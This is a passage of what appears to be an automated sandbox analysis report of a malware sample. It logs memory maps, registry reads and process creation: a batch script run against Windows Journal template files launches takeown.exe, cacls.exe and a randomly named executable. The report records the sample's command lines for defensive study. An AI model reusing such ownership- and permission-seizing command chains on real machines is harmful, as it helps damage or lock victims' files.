- |
| private_0x0000000000410000 | 0x00410000 | 0x0044ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00490000 | 0x00491fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0053ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x007fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00800000 | 0x00b36fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f9a0000 | 0x7f9a0000 | 0x7fa9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007faa0000 | 0x7faa0000 | 0x7fac2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fac6000 | 0x7fac6000 | 0x7fac8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fac9000 | 0x7fac9000 | 0x7fac9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007facc000 | 0x7facc000 | 0x7faccfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007facd000 | 0x7facd000 | 0x7facffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #161: cmd.exe
338
0
| Information | Value |
|---|---|
| ID | #161 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:01, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xde0 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F78
0x
5BC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000120000 | 0x00120000 | 0x0013ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x0012ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x00133fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00141fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00143fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00163fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002e0000 | 0x0039dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x0443ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0453ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004540000 | 0x04540000 | 0x045effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004610000 | 0x04610000 | 0x0461ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004620000 | 0x04620000 | 0x048dffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x048e0000 | 0x04c16fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007fa00000 | 0x7fa00000 | 0x7fafffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fb00000 | 0x7fb00000 | 0x7fb22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fb26000 | 0x7fb26000 | 0x7fb26fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fb29000 | 0x7fb29000 | 0x7fb2bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fb2c000 | 0x7fb2c000 | 0x7fb2efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fb2f000 | 0x7fb2f000 | 0x7fb2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (256)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
130 | |
| Open | STD_INPUT_HANDLE | - |
|
7 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 80 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 16 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 54 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 232, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x3a0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x36c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xc7c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Music.jtp" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "Music.jtp" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #162: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #162 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "jnwmon.dll.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:01, Reason: Child Process |
| Unmonitor | End Time: 00:03:09, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x95c |
| Parent PID | 0xc54 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
274
0x
87C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x04a3ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a40000 | 0x04a40000 | 0x04a5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a40000 | 0x04a40000 | 0x04a4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004a50000 | 0x04a50000 | 0x04a53fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a60000 | 0x04a60000 | 0x04a61fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a60000 | 0x04a60000 | 0x04a63fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a70000 | 0x04a70000 | 0x04a83fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004a90000 | 0x04a90000 | 0x04acffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ad0000 | 0x04ad0000 | 0x04bcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004bd0000 | 0x04bd0000 | 0x04bd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004be0000 | 0x04be0000 | 0x04be0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004bf0000 | 0x04bf0000 | 0x04bf1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04c00000 | 0x04cbdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04f7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d40000 | 0x04d40000 | 0x04e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e80000 | 0x04e80000 | 0x04f7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f80000 | 0x04f80000 | 0x04fcffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04fd0000 | 0x05306fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e0e0000 | 0x7e0e0000 | 0x7e1dffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e1e0000 | 0x7e1e0000 | 0x7e202fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e204000 | 0x7e204000 | 0x7e204fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e205000 | 0x7e205000 | 0x7e205fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e20a000 | 0x7e20a000 | 0x7e20cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e20d000 | 0x7e20d000 | 0x7e20ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 176, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xf94, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #164: qry2vco2.exe
179
0
| Information | Value |
|---|---|
| ID | #164 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula "Graph.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:04, Reason: Child Process |
| Unmonitor | End Time: 00:03:22, Reason: Self Terminated |
| Monitor Duration | 00:00:18 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x594 |
| Parent PID | 0xfe8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BAC
0x
F84
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
